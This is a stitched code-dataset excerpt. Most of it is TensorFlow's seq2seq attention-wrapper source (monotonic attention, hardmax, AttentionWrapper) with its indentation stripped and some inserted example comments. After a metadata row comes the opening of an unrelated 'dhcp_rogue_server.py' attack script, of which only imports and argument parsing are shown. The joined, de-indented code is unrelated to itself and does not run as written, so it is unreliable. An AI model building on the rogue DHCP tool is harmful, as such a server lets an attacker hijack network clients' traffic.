`[batch_size, alignments_size]`
(`alignments_size` is memory's `max_time`).
Returns:
alignments: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]` (`alignments_size` is memory's
`max_time`).
"""
with variable_scope.variable_scope(None, "bahdanau_attention", [query]):
processed_query = self.query_layer(query) if self.query_layer else query
score = _bahdanau_score(processed_query, self._keys, self._normalize)
alignments = self._probability_fn(score, state)
next_state = alignments
return alignments, next_state
def safe_cumprod(x, *args, **kwargs):
"""Computes cumprod of x in logspace using cumsum to avoid underflow.
The cumprod function and its gradient can result in numerical instabilities
when its argument has very small and/or zero values. As long as the argument
is all positive, we can instead compute the cumulative product as
exp(cumsum(log(x))). This function can be called identically to tf.cumprod.
Args:
x: Tensor to take the cumulative product of.
*args: Passed on to cumsum; these are identical to those in cumprod.
**kwargs: Passed on to cumsum; these are identical to those in cumprod.
Returns:
Cumulative product of x.
"""
with ops.name_scope(None, "SafeCumprod", [x]):
x = ops.convert_to_tensor(x, name="x")
tiny = np.finfo(x.dtype.as_numpy_dtype).tiny
return math_ops.exp(math_ops.cumsum(
math_ops.log(clip_ops.clip_by_value(x, tiny, 1)), *args, **kwargs))
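# Editorial check of the logspace identity used above (illustrative values only):
# for strictly positive x, cumprod(x) == exp(cumsum(log(x))).
_example_x = np.array([0.5, 0.2, 0.1], dtype=np.float32)
_example_identity_holds = np.allclose(
    np.cumprod(_example_x),                      # [0.5, 0.1, 0.01]
    np.exp(np.cumsum(np.log(_example_x))))       # same values up to float rounding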
def monotonic_attention(p_choose_i, previous_attention, mode):
"""Compute monotonic attention distribution from choosing probabilities.
Monotonic attention implies that the input sequence is processed in an
explicitly left-to-right manner when generating the output sequence. In
addition, once an input sequence element is attended to at a given output
timestep, elements occurring before it cannot be attended to at subsequent
output timesteps. This function generates attention distributions according
to these assumptions. For more information, see ``Online and Linear-Time
Attention by Enforcing Monotonic Alignments''.
Args:
p_choose_i: Probability of choosing input sequence/memory element i. Should
be of shape (batch_size, input_sequence_length), and should all be in the
range [0, 1].
previous_attention: The attention distribution from the previous output
timestep. Should be of shape (batch_size, input_sequence_length). For
      the first output timestep, previous_attention[n] should be [1, 0, 0, ...,
0] for all n in [0, ... batch_size - 1].
mode: How to compute the attention distribution. Must be one of
'recursive', 'parallel', or 'hard'.
* 'recursive' uses tf.scan to recursively compute the distribution.
This is slowest but is exact, general, and does not suffer from
numerical instabilities.
* 'parallel' uses parallelized cumulative-sum and cumulative-product
operations to compute a closed-form solution to the recurrence
relation defining the attention distribution. This makes it more
efficient than 'recursive', but it requires numerical checks which
make the distribution non-exact. This can be a problem in particular
when input_sequence_length is long and/or p_choose_i has entries very
close to 0 or 1.
* 'hard' requires that the probabilities in p_choose_i are all either 0
or 1, and subsequently uses a more efficient and exact solution.
Returns:
A tensor of shape (batch_size, input_sequence_length) representing the
attention distributions for each sequence in the batch.
Raises:
ValueError: mode is not one of 'recursive', 'parallel', 'hard'.
"""
# Force things to be tensors
p_choose_i = ops.convert_to_tensor(p_choose_i, name="p_choose_i")
previous_attention = ops.convert_to_tensor(
previous_attention, name="previous_attention")
if mode == "recursive":
# Use .shape[0].value when it's not None, or fall back on symbolic shape
batch_size = p_choose_i.shape[0].value or array_ops.shape(p_choose_i)[0]
# Compute [1, 1 - p_choose_i[0], 1 - p_choose_i[1], ..., 1 - p_choose_i[-2]]
shifted_1mp_choose_i = array_ops.concat(
[array_ops.ones((batch_size, 1)), 1 - p_choose_i[:, :-1]], 1)
# Compute attention distribution recursively as
# q[i] = (1 - p_choose_i[i])*q[i - 1] + previous_attention[i]
# attention[i] = p_choose_i[i]*q[i]
attention = p_choose_i*array_ops.transpose(functional_ops.scan(
# Need to use reshape to remind TF of the shape between loop iterations
lambda x, yz: array_ops.reshape(yz[0]*x + yz[1], (batch_size,)),
# Loop variables yz[0] and yz[1]
[array_ops.transpose(shifted_1mp_choose_i),
array_ops.transpose(previous_attention)],
# Initial value of x is just zeros
array_ops.zeros((batch_size,))))
elif mode == "parallel":
# safe_cumprod computes cumprod in logspace with numeric checks
cumprod_1mp_choose_i = safe_cumprod(1 - p_choose_i, axis=1, exclusive=True)
# Compute recurrence relation solution
attention = p_choose_i*cumprod_1mp_choose_i*math_ops.cumsum(
previous_attention /
# Clip cumprod_1mp to avoid divide-by-zero
clip_ops.clip_by_value(cumprod_1mp_choose_i, 1e-10, 1.), axis=1)
elif mode == "hard":
# Remove any probabilities before the index chosen last time step
p_choose_i *= math_ops.cumsum(previous_attention, axis=1)
# Now, use exclusive cumprod to remove probabilities after the first
# chosen index, like so:
# p_choose_i = [0, 0, 0, 1, 1, 0, 1, 1]
# cumprod(1 - p_choose_i, exclusive=True) = [1, 1, 1, 1, 0, 0, 0, 0]
# Product of above: [0, 0, 0, 1, 0, 0, 0, 0]
attention = p_choose_i*math_ops.cumprod(
1 - p_choose_i, axis=1, exclusive=True)
else:
raise ValueError("mode must be 'recursive', 'parallel', or 'hard'.")
return attention
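# Editorial worked example of 'hard' mode (illustrative values, not from the module).
# With the previous attention on index 1 and p_choose_i selecting indices 2 and 3,
# the new attention lands on index 2, the first chosen index at or after index 1:
_example_p_choose = np.array([[0., 0., 1., 1.]], dtype=np.float32)
_example_previous = np.array([[0., 1., 0., 0.]], dtype=np.float32)
_example_p = _example_p_choose * np.cumsum(_example_previous, axis=1)  # [[0., 0., 1., 1.]]
_example_shifted = np.concatenate(
    [[1.], np.cumprod(1. - _example_p[0])[:-1]])                       # exclusive cumprod
_example_attention = _example_p[0] * _example_shifted                  # [0., 0., 1., 0.]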
def _monotonic_probability_fn(score, previous_alignments, sigmoid_noise, mode,
seed=None):
"""Attention probability function for monotonic attention.
Takes in unnormalized attention scores, adds pre-sigmoid noise to encourage
the model to make discrete attention decisions, passes them through a sigmoid
to obtain "choosing" probabilities, and then calls monotonic_attention to
obtain the attention distribution. For more information, see
Colin Raffel, Minh-Thang Luong, Peter J. Liu, Ron J. Weiss, Douglas Eck,
"Online and Linear-Time Attention by Enforcing Monotonic Alignments."
ICML 2017. https://arxiv.org/abs/1704.00784
Args:
score: Unnormalized attention scores, shape `[batch_size, alignments_size]`
previous_alignments: Previous attention distribution, shape
`[batch_size, alignments_size]`
sigmoid_noise: Standard deviation of pre-sigmoid noise. Setting this larger
than 0 will encourage the model to produce large attention scores,
effectively making the choosing probabilities discrete and the resulting
attention distribution one-hot. It should be set to 0 at test-time, and
when hard attention is not desired.
mode: How to compute the attention distribution. Must be one of
'recursive', 'parallel', or 'hard'. See the docstring for
`tf.contrib.seq2seq.monotonic_attention` for more information.
seed: (optional) Random seed for pre-sigmoid noise.
Returns:
A `[batch_size, alignments_size]`-shape tensor corresponding to the
resulting attention distribution.
"""
# Optionally add pre-sigmoid noise to the scores
if sigmoid_noise > 0:
noise = random_ops.random_normal(array_ops.shape(score), dtype=score.dtype,
seed=seed)
score += sigmoid_noise*noise
# Compute "choosing" probabilities from the attention scores
if mode == "hard":
# When mode is hard, use a hard sigmoid
p_choose_i = math_ops.cast(score > 0, score.dtype)
else:
p_choose_i = math_ops.sigmoid(score)
# Convert from choosing probabilities to attention distribution
return monotonic_attention(p_choose_i, previous_alignments, mode)
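# Editorial note: in 'hard' mode the pre-sigmoid scores are simply thresholded at
# zero, so p_choose_i is exactly 0 or 1 as monotonic_attention's 'hard' mode
# requires; in the soft modes a plain sigmoid keeps the probabilities in (0, 1).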
class _BaseMonotonicAttentionMechanism(_BaseAttentionMechanism):
"""Base attention mechanism for monotonic attention.
Simply overrides the initial_alignments function to provide a dirac
  distribution, which is needed in order for the monotonic attention
distributions to have the correct behavior.
"""
def initial_alignments(self, batch_size, dtype):
"""Creates the initial alignment values for the monotonic attentions.
Initializes to dirac distributions, i.e. [1, 0, 0, ...memory length..., 0]
for all entries in the batch.
Args:
batch_size: `int32` scalar, the batch_size.
dtype: The `dtype`.
Returns:
A `dtype` tensor shaped `[batch_size, alignments_size]`
(`alignments_size` is the values' `max_time`).
"""
max_time = self._alignments_size
return array_ops.one_hot(
array_ops.zeros((batch_size,), dtype=dtypes.int32), max_time,
dtype=dtype)
class BahdanauMonotonicAttention(_BaseMonotonicAttentionMechanism):
"""Monotonic attention mechanism with Bahadanau-style energy function.
This type of attention encorces a monotonic constraint on the attention
distributions; that is once the model attends to a given point in the memory
it can't attend to any prior points at subsequence output timesteps. It
achieves this by using the _monotonic_probability_fn instead of softmax to
construct its attention distributions. Since the attention scores are passed
through a sigmoid, a learnable scalar bias parameter is applied after the
score function and before the sigmoid. Otherwise, it is equivalent to
BahdanauAttention. This approach is proposed in
Colin Raffel, Minh-Thang Luong, Peter J. Liu, Ron J. Weiss, Douglas Eck,
"Online and Linear-Time Attention by Enforcing Monotonic Alignments."
ICML 2017. https://arxiv.org/abs/1704.00784
"""
def __init__(self,
num_units,
memory,
memory_sequence_length=None,
normalize=False,
score_mask_value=None,
sigmoid_noise=0.,
sigmoid_noise_seed=None,
score_bias_init=0.,
mode="parallel",
dtype=None,
name="BahdanauMonotonicAttention"):
"""Construct the Attention mechanism.
Args:
num_units: The depth of the query mechanism.
memory: The memory to query; usually the output of an RNN encoder. This
tensor should be shaped `[batch_size, max_time, ...]`.
memory_sequence_length (optional): Sequence lengths for the batch entries
in memory. If provided, the memory tensor rows are masked with zeros
for values past the respective sequence lengths.
normalize: Python boolean. Whether to normalize the energy term.
score_mask_value: (optional): The mask value for score before passing into
`probability_fn`. The default is -inf. Only used if
`memory_sequence_length` is not None.
sigmoid_noise: Standard deviation of pre-sigmoid noise. See the docstring
for `_monotonic_probability_fn` for more information.
sigmoid_noise_seed: (optional) Random seed for pre-sigmoid noise.
score_bias_init: Initial value for score bias scalar. It's recommended to
initialize this to a negative value when the length of the memory is
large.
mode: How to compute the attention distribution. Must be one of
'recursive', 'parallel', or 'hard'. See the docstring for
`tf.contrib.seq2seq.monotonic_attention` for more information.
dtype: The data type for the query and memory layers of the attention
mechanism.
name: Name to use when creating ops.
"""
# Set up the monotonic probability fn with supplied parameters
if dtype is None:
dtype = dtypes.float32
wrapped_probability_fn = functools.partial(
_monotonic_probability_fn, sigmoid_noise=sigmoid_noise, mode=mode,
seed=sigmoid_noise_seed)
super(BahdanauMonotonicAttention, self).__init__(
query_layer=layers_core.Dense(
num_units, name="query_layer", use_bias=False, dtype=dtype),
memory_layer=layers_core.Dense(
num_units, name="memory_layer", use_bias=False, dtype=dtype),
memory=memory,
probability_fn=wrapped_probability_fn,
memory_sequence_length=memory_sequence_length,
score_mask_value=score_mask_value,
name=name)
self._num_units = num_units
self._normalize = normalize
self._name = name
self._score_bias_init = score_bias_init
def __call__(self, query, state):
"""Score the query based on the keys and values.
Args:
query: Tensor of dtype matching `self.values` and shape
`[batch_size, query_depth]`.
state: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]`
(`alignments_size` is memory's `max_time`).
Returns:
alignments: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]` (`alignments_size` is memory's
`max_time`).
"""
with variable_scope.variable_scope(
None, "bahdanau_monotonic_attention", [query]):
processed_query = self.query_layer(query) if self.query_layer else query
score = _bahdanau_score(processed_query, self._keys, self._normalize)
score_bias = variable_scope.get_variable(
"attention_score_bias", dtype=processed_query.dtype,
initializer=self._score_bias_init)
score += score_bias
alignments = self._probability_fn(score, state)
next_state = alignments
return alignments, next_state
class LuongMonotonicAttention(_BaseMonotonicAttentionMechanism):
"""Monotonic attention mechanism with Luong-style energy function.
  This type of attention enforces a monotonic constraint on the attention
  distributions; that is, once the model attends to a given point in the memory
  it can't attend to any prior points at subsequent output timesteps. It
achieves this by using the _monotonic_probability_fn instead of softmax to
construct its attention distributions. Otherwise, it is equivalent to
LuongAttention. This approach is proposed in
Colin Raffel, Minh-Thang Luong, Peter J. Liu, Ron J. Weiss, Douglas Eck,
"Online and Linear-Time Attention by Enforcing Monotonic Alignments."
ICML 2017. https://arxiv.org/abs/1704.00784
"""
def __init__(self,
num_units,
memory,
memory_sequence_length=None,
scale=False,
score_mask_value=None,
sigmoid_noise=0.,
sigmoid_noise_seed=None,
score_bias_init=0.,
mode="parallel",
dtype=None,
name="LuongMonotonicAttention"):
"""Construct the Attention mechanism.
Args:
num_units: The depth of the query mechanism.
memory: The memory to query; usually the output of an RNN encoder. This
tensor should be shaped `[batch_size, max_time, ...]`.
memory_sequence_length (optional): Sequence lengths for the batch entries
in memory. If provided, the memory tensor rows are masked with zeros
for values past the respective sequence lengths.
scale: Python boolean. Whether to scale the energy term.
score_mask_value: (optional): The mask value for score before passing into
`probability_fn`. The default is -inf. Only used if
`memory_sequence_length` is not None.
sigmoid_noise: Standard deviation of pre-sigmoid noise. See the docstring
for `_monotonic_probability_fn` for more information.
sigmoid_noise_seed: (optional) Random seed for pre-sigmoid noise.
score_bias_init: Initial value for score bias scalar. It's recommended to
initialize this to a negative value when the length of the memory is
large.
mode: How to compute the attention distribution. Must be one of
'recursive', 'parallel', or 'hard'. See the docstring for
`tf.contrib.seq2seq.monotonic_attention` for more information.
dtype: The data type for the query and memory layers of the attention
mechanism.
name: Name to use when creating ops.
"""
# Set up the monotonic probability fn with supplied parameters
if dtype is None:
dtype = dtypes.float32
wrapped_probability_fn = functools.partial(
_monotonic_probability_fn, sigmoid_noise=sigmoid_noise, mode=mode,
seed=sigmoid_noise_seed)
super(LuongMonotonicAttention, self).__init__(
query_layer=None,
memory_layer=layers_core.Dense(
num_units, name="memory_layer", use_bias=False, dtype=dtype),
memory=memory,
probability_fn=wrapped_probability_fn,
memory_sequence_length=memory_sequence_length,
score_mask_value=score_mask_value,
name=name)
self._num_units = num_units
self._scale = scale
self._score_bias_init = score_bias_init
self._name = name
def __call__(self, query, state):
"""Score the query based on the keys and values.
Args:
query: Tensor of dtype matching `self.values` and shape
`[batch_size, query_depth]`.
state: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]`
(`alignments_size` is memory's `max_time`).
Returns:
alignments: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]` (`alignments_size` is memory's
`max_time`).
"""
with variable_scope.variable_scope(None, "luong_monotonic_attention",
[query]):
score = _luong_score(query, self._keys, self._scale)
score_bias = variable_scope.get_variable(
"attention_score_bias", dtype=query.dtype,
initializer=self._score_bias_init)
score += score_bias
alignments = self._probability_fn(score, state)
next_state = alignments
return alignments, next_state
class AttentionWrapperState(
collections.namedtuple("AttentionWrapperState",
("cell_state", "attention", "time", "alignments",
"alignment_history", "attention_state"))):
"""`namedtuple` storing the state of a `AttentionWrapper`.
Contains:
- `cell_state`: The state of the wrapped `RNNCell` at the previous time
step.
- `attention`: The attention emitted at the previous time step.
- `time`: int32 scalar containing the current time step.
- `alignments`: A single or tuple of `Tensor`(s) containing the alignments
emitted at the previous time step for each attention mechanism.
- `alignment_history`: (if enabled) a single or tuple of `TensorArray`(s)
containing alignment matrices from all time steps for each attention
mechanism. Call `stack()` on each to convert to a `Tensor`.
- `attention_state`: A single or tuple of nested objects
containing attention mechanism state for each attention mechanism.
The objects may contain Tensors or TensorArrays.
"""
def clone(self, **kwargs):
"""Clone this object, overriding components provided by kwargs.
The new state fields' shape must match original state fields' shape. This
will be validated, and original fields' shape will be propagated to new
fields.
Example:
```python
initial_state = attention_wrapper.zero_state(dtype=..., batch_size=...)
initial_state = initial_state.clone(cell_state=encoder_state)
```
Args:
**kwargs: Any properties of the state object to replace in the returned
`AttentionWrapperState`.
Returns:
A new `AttentionWrapperState` whose properties are the same as
this one, except any overridden properties as provided in `kwargs`.
"""
def with_same_shape(old, new):
"""Check and set new tensor's shape."""
if isinstance(old, ops.Tensor) and isinstance(new, ops.Tensor):
return tensor_util.with_same_shape(old, new)
return new
return nest.map_structure(
with_same_shape,
self,
super(AttentionWrapperState, self)._replace(**kwargs))
def hardmax(logits, name=None):
"""Returns batched one-hot vectors.
The depth index containing the `1` is that of the maximum logit value.
Args:
logits: A batch tensor of logit values.
name: Name to use when creating ops.
Returns:
A batched one-hot tensor.
"""
with ops.name_scope(name, "Hardmax", [logits]):
logits = ops.convert_to_tensor(logits, name="logits")
if logits.get_shape()[-1].value is not None:
depth = logits.get_shape()[-1].value
else:
depth = array_ops.shape(logits)[-1]
return array_ops.one_hot(
math_ops.argmax(logits, -1), depth, dtype=logits.dtype)
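# Editorial sketch (illustrative logits, not part of the original module): hardmax
# maps each row to a one-hot vector at its argmax position.
_example_logits = np.array([[0.1, 2.0, 0.3], [4.0, 1.0, 0.5]], dtype=np.float32)
# hardmax(_example_logits) evaluates to [[0., 1., 0.], [1., 0., 0.]].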
def _compute_attention(attention_mechanism, cell_output, attention_state,
attention_layer):
"""Computes the attention and alignments for a given attention_mechanism."""
alignments, next_attention_state = attention_mechanism(
cell_output, state=attention_state)
# Reshape from [batch_size, memory_time] to [batch_size, 1, memory_time]
expanded_alignments = array_ops.expand_dims(alignments, 1)
# Context is the inner product of alignments and values along the
# memory time dimension.
# alignments shape is
# [batch_size, 1, memory_time]
# attention_mechanism.values shape is
# [batch_size, memory_time, memory_size]
# the batched matmul is over memory_time, so the output shape is
# [batch_size, 1, memory_size].
# we then squeeze out the singleton dim.
context = math_ops.matmul(expanded_alignments, attention_mechanism.values)
context = array_ops.squeeze(context, [1])
if attention_layer is not None:
attention = attention_layer(array_ops.concat([cell_output, context], 1))
else:
attention = context
return attention, alignments, next_attention_state
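# Editorial shape sketch (illustrative numbers, not taken from the original file):
# with batch_size=4, memory_time=7 and memory_size=16, `alignments` is [4, 7], the
# expanded alignments are [4, 1, 7], the matmul against values of shape [4, 7, 16]
# yields [4, 1, 16], and the squeeze leaves a [4, 16] context vector.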
class AttentionWrapper(rnn_cell_impl.RNNCell):
"""Wraps another `RNNCell` with attention.
"""
def __init__(self,
cell,
attention_mechanism,
attention_layer_size=None,
alignment_history=False,
cell_input_fn=None,
output_attention=True,
initial_cell_state=None,
name=None):
"""Construct the `AttentionWrapper`.
**NOTE** If you are using the `BeamSearchDecoder` with a cell wrapped in
`AttentionWrapper`, then you must ensure that:
- The encoder output has been tiled to `beam_width` via
@{tf.contrib.seq2seq.tile_batch} (NOT `tf.tile`).
- The `batch_size` argument passed to the `zero_state` method of this
wrapper is equal to `true_batch_size * beam_width`.
- The initial state created with `zero_state` above contains a
`cell_state` value containing properly tiled final state from the
encoder.
An example:
```
tiled_encoder_outputs = tf.contrib.seq2seq.tile_batch(
encoder_outputs, multiplier=beam_width)
    tiled_encoder_final_state = tf.contrib.seq2seq.tile_batch(
encoder_final_state, multiplier=beam_width)
tiled_sequence_length = tf.contrib.seq2seq.tile_batch(
sequence_length, multiplier=beam_width)
attention_mechanism = MyFavoriteAttentionMechanism(
num_units=attention_depth,
        memory=tiled_encoder_outputs,
memory_sequence_length=tiled_sequence_length)
attention_cell = AttentionWrapper(cell, attention_mechanism, ...)
decoder_initial_state = attention_cell.zero_state(
dtype, batch_size=true_batch_size * beam_width)
decoder_initial_state = decoder_initial_state.clone(
cell_state=tiled_encoder_final_state)
```
Args:
cell: An instance of `RNNCell`.
attention_mechanism: A list of `AttentionMechanism` instances or a single
instance.
attention_layer_size: A list of Python integers or a single Python
integer, the depth of the attention (output) layer(s). If None
(default), use the context as attention at each time step. Otherwise,
feed the context and cell output into the attention layer to generate
attention at each time step. If attention_mechanism is a list,
attention_layer_size must be a list of the same length.
alignment_history: Python boolean, whether to store alignment history
from all time steps in the final output state (currently stored as a
time major `TensorArray` on which you must call `stack()`).
cell_input_fn: (optional) A `callable`. The default is:
`lambda inputs, attention: array_ops.concat([inputs, attention], -1)`.
output_attention: Python bool. If `True` (default), the output at each
time step is the attention value. This is the behavior of Luong-style
attention mechanisms. If `False`, the output at each time step is
        the output of `cell`. This is the behavior of Bahdanau-style
attention mechanisms. In both cases, the `attention` tensor is
propagated to the next time step via the state and is used there.
This flag only controls whether the attention mechanism is propagated
up to the next cell in an RNN stack or to the top RNN output.
initial_cell_state: The initial state value to use for the cell when
the user calls `zero_state()`. Note that if this value is provided
now, and the user uses a `batch_size` argument of `zero_state` which
does not match the batch size of `initial_cell_state`, proper
behavior is not guaranteed.
name: Name to use when creating ops.
Raises:
TypeError: `attention_layer_size` is not None and (`attention_mechanism`
is a list but `attention_layer_size` is not; or vice versa).
ValueError: if `attention_layer_size` is not None, `attention_mechanism`
is a list, and its length does not match that of `attention_layer_size`.
"""
super(AttentionWrapper, self).__init__(name=name)
rnn_cell_impl.assert_like_rnncell("cell", cell)
if isinstance(attention_mechanism, (list, tuple)):
self._is_multi = True
attention_mechanisms = attention_mechanism
for attention_mechanism in attention_mechanisms:
if not isinstance(attention_mechanism, AttentionMechanism):
raise TypeError(
"attention_mechanism must contain only instances of "
"AttentionMechanism, saw type: %s"
% type(attention_mechanism).__name__)
else:
self._is_multi = False
if not isinstance(attention_mechanism, AttentionMechanism):
raise TypeError(
"attention_mechanism must be an AttentionMechanism or list of "
"multiple AttentionMechanism instances, saw type: %s"
% type(attention_mechanism).__name__)
attention_mechanisms = (attention_mechanism,)
if cell_input_fn is None:
cell_input_fn = (
lambda inputs, attention: array_ops.concat([inputs, attention], -1))
else:
if not callable(cell_input_fn):
raise TypeError(
"cell_input_fn must be callable, saw type: %s"
% type(cell_input_fn).__name__)
if attention_layer_size is not None:
attention_layer_sizes = tuple(
attention_layer_size
if isinstance(attention_layer_size, (list, tuple))
else (attention_layer_size,))
if len(attention_layer_sizes) != len(attention_mechanisms):
raise ValueError(
"If provided, attention_layer_size must contain exactly one "
"integer per attention_mechanism, saw: %d vs %d"
% (len(attention_layer_sizes), len(attention_mechanisms)))
self._attention_layers = tuple(
layers_core.Dense(
attention_layer_size,
name="attention_layer",
use_bias=False,
dtype=attention_mechanisms[i].dtype)
for i, attention_layer_size in enumerate(attention_layer_sizes))
self._attention_layer_size = sum(attention_layer_sizes)
else:
self._attention_layers = None
self._attention_layer_size = sum(
attention_mechanism.values.get_shape()[-1].value
for attention_mechanism in attention_mechanisms)
self._cell = cell
self._attention_mechanisms = attention_mechanisms
self._cell_input_fn = cell_input_fn
self._output_attention = output_attention
self._alignment_history = alignment_history
with ops.name_scope(name, "AttentionWrapperInit"):
if initial_cell_state is None:
self._initial_cell_state = None
else:
final_state_tensor = nest.flatten(initial_cell_state)[-1]
state_batch_size = (
final_state_tensor.shape[0].value
or array_ops.shape(final_state_tensor)[0])
error_message = (
"When constructing AttentionWrapper %s: " % self._base_name +
"Non-matching batch sizes between the memory "
"(encoder output) and initial_cell_state. Are you using "
"the BeamSearchDecoder? You may need to tile your initial state "
"via the tf.contrib.seq2seq.tile_batch function with argument "
"multiple=beam_width.")
with ops.control_dependencies(
self._batch_size_checks(state_batch_size, error_message)):
self._initial_cell_state = nest.map_structure(
lambda s: array_ops.identity(s, name="check_initial_cell_state"),
initial_cell_state)
def _batch_size_checks(self, batch_size, error_message):
return [check_ops.assert_equal(batch_size,
attention_mechanism.batch_size,
message=error_message)
for attention_mechanism in self._attention_mechanisms]
def _item_or_tuple(self, seq):
"""Returns `seq` as tuple or the singular element.
Which is returned is determined by how the AttentionMechanism(s) were passed
to the constructor.
Args:
seq: A non-empty sequence of items or generator.
Returns:
Either the values in the sequence as a tuple if AttentionMechanism(s)
were passed to the constructor as a sequence or the singular element.
"""
t = tuple(seq)
if self._is_multi:
return t
else:
return t[0]
@property
def output_size(self):
if self._output_attention:
return self._attention_layer_size
else:
return self._cell.output_size
@property
def state_size(self):
"""The `state_size` property of `AttentionWrapper`.
Returns:
An `AttentionWrapperState` tuple containing shapes used by this object.
"""
return AttentionWrapperState(
cell_state=self._cell.state_size,
time=tensor_shape.TensorShape([]),
attention=self._attention_layer_size,
alignments=self._item_or_tuple(
a.alignments_size for a in self._attention_mechanisms),
attention_state=self._item_or_tuple(
a.state_size for a in self._attention_mechanisms),
alignment_history=self._item_or_tuple(
a.alignments_size if self._alignment_history else ()
for a in self._attention_mechanisms)) # sometimes a TensorArray
def zero_state(self, batch_size, dtype):
"""Return an initial (zero) state tuple for this `AttentionWrapper`.
**NOTE** Please see the initializer documentation for details of how
to call `zero_state` if using an `AttentionWrapper` with a
`BeamSearchDecoder`.
Args:
batch_size: `0D` integer tensor: the batch size.
dtype: The internal state data type.
Returns:
An `AttentionWrapperState` tuple containing zeroed out tensors and,
possibly, empty `TensorArray` objects.
Raises:
ValueError: (or, possibly at runtime, InvalidArgument), if
`batch_size` does not match the output size of the encoder passed
to the wrapper object at initialization time.
"""
with ops.name_scope(type(self).__name__ + "ZeroState", values=[batch_size]):
if self._initial_cell_state is not None:
cell_state = self._initial_cell_state
else:
cell_state = self._cell.zero_state(batch_size, dtype)
error_message = (
"When calling zero_state of AttentionWrapper %s: " % self._base_name +
"Non-matching batch sizes between the memory "
"(encoder output) and the requested batch size. Are you using "
"the BeamSearchDecoder? If so, make sure your encoder output has "
"been tiled to beam_width via tf.contrib.seq2seq.tile_batch, and "
"the batch_size= argument passed to zero_state is "
"batch_size * beam_width.")
with ops.control_dependencies(
self._batch_size_checks(batch_size, error_message)):
cell_state = nest.map_structure(
lambda s: array_ops.identity(s, name="checked_cell_state"),
cell_state)
initial_alignments = [
attention_mechanism.initial_alignments(batch_size, dtype)
for attention_mechanism in self._attention_mechanisms]
return AttentionWrapperState(
cell_state=cell_state,
time=array_ops.zeros([], dtype=dtypes.int32),
attention=_zero_state_tensors(self._attention_layer_size, batch_size,
dtype),
alignments=self._item_or_tuple(initial_alignments),
attention_state=self._item_or_tuple(
attention_mechanism.initial_state(batch_size, dtype)
for attention_mechanism in self._attention_mechanisms),
alignment_history=self._item_or_tuple(
tensor_array_ops.TensorArray(
dtype,
size=0,
dynamic_size=True,
element_shape=alignment.shape)
if self._alignment_history else ()
for alignment in initial_alignments))
def call(self, inputs, state):
"""Perform a step of attention-wrapped RNN.
- Step 1: Mix the `inputs` and previous step's `attention` output via
`cell_input_fn`.
- Step 2: Call the wrapped `cell` with this input and its previous state.
- Step 3: Score the cell's output with `attention_mechanism`.
- Step 4: Calculate the alignments by passing the score through the
`normalizer`.
- Step 5: Calculate the context vector as the inner product between the
alignments and the attention_mechanism's values (memory).
- Step 6: Calculate the attention output by concatenating the cell output
and context through the attention layer (a linear layer with
`attention_layer_size` outputs).
Args:
inputs: (Possibly nested tuple of) Tensor, the input at this time step.
state: An instance of `AttentionWrapperState` containing
tensors from the previous time step.
Returns:
A tuple `(attention_or_cell_output, next_state)`, where:
- `attention_or_cell_output` depending on `output_attention`.
- `next_state` is an instance of `AttentionWrapperState`
containing the state calculated at this time step.
Raises:
TypeError: If `state` is not an instance of `AttentionWrapperState`.
"""
if not isinstance(state, AttentionWrapperState):
raise TypeError("Expected state to be instance of AttentionWrapperState. "
"Received type %s instead." % type(state))
# Step 1: Calculate the true inputs to the cell based on the
# previous attention value.
cell_inputs = self._cell_input_fn(inputs, state.attention)
cell_state = state.cell_state
cell_output, next_cell_state = self._cell(cell_inputs, cell_state)
cell_batch_size = (
cell_output.shape[0].value or array_ops.shape(cell_output)[0])
error_message = (
"When applying AttentionWrapper %s: " % self.name +
"Non-matching batch sizes between the memory "
"(encoder output) and the query (decoder output). Are you using "
"the BeamSearchDecoder? You may need to tile your memory input via "
"the tf.contrib.seq2seq.tile_batch function with argument "
"multiple=beam_width.")
with ops.control_dependencies(
self._batch_size_checks(cell_batch_size, error_message)):
cell_output = array_ops.identity(
cell_output, name="checked_cell_output")
if self._is_multi:
previous_attention_state = state.attention_state
previous_alignment_history = state.alignment_history
else:
previous_attention_state = [state.attention_state]
previous_alignment_history = [state.alignment_history]
all_alignments = []
all_attentions = []
all_attention_states = []
maybe_all_histories = []
for i, attention_mechanism in enumerate(self._attention_mechanisms):
attention, alignments, next_attention_state = _compute_attention(
attention_mechanism, cell_output, previous_attention_state[i],
self._attention_layers[i] if self._attention_layers else None)
alignment_history = previous_alignment_history[i].write(
state.time, alignments) if self._alignment_history else ()
all_attention_states.append(next_attention_state)
all_alignments.append(alignments)
all_attentions.append(attention)
maybe_all_histories.append(alignment_history)
attention = array_ops.concat(all_attentions, 1)
next_state = AttentionWrapperState(
time=state.time + 1,
cell_state=next_cell_state,
attention=attention,
attention_state=self._item_or_tuple(all_attention_states),
alignments=self._item_or_tuple(all_alignments),
alignment_history=self._item_or_tuple(maybe_all_histories))
if self._output_attention:
return attention, next_state
else:
return cell_output, next_state
| apache-2.0 | -8,393,192,901,681,401,000 | 40.782821 | 94 | 0.670449 | false |
Vladimir-Ivanov-Git/raw-packet | Scripts/DHCP/dhcp_rogue_server.py | 1 | 47873 | #!/usr/bin/env python
# region Import
from sys import path
from os.path import dirname, abspath
project_root_path = dirname(dirname(dirname(abspath(__file__))))
utils_path = project_root_path + "/Utils/"
path.append(utils_path)
from base import Base
from network import Ethernet_raw, ARP_raw, IP_raw, UDP_raw, DHCP_raw
from tm import ThreadManager
from scanner import Scanner
from sys import exit
from argparse import ArgumentParser
from ipaddress import IPv4Address
from socket import socket, AF_PACKET, SOCK_RAW, htons
from os import errno, makedirs
from shutil import copyfile
from base64 import b64encode
from netaddr import IPAddress
from time import sleep
from random import randint
import subprocess as sub
# endregion
# region Check user, platform and create threads
Base = Base()
Scanner = Scanner()
Base.check_user()
Base.check_platform()
tm = ThreadManager(3)
# endregion
# region Parse script arguments
parser = ArgumentParser(description='DHCP Rogue server')
parser.add_argument('-i', '--interface', help='Set interface name for send reply packets')
parser.add_argument('-f', '--first_offer_ip', type=str, help='Set first client ip for offering', default=None)
parser.add_argument('-l', '--last_offer_ip', type=str, help='Set last client ip for offering', default=None)
parser.add_argument('-t', '--target_mac', type=str, help='Set target MAC address', default=None)
parser.add_argument('-T', '--target_ip', type=str, help='Set client IP address with MAC in --target_mac', default=None)
parser.add_argument('-m', '--netmask', type=str, help='Set network mask', default=None)
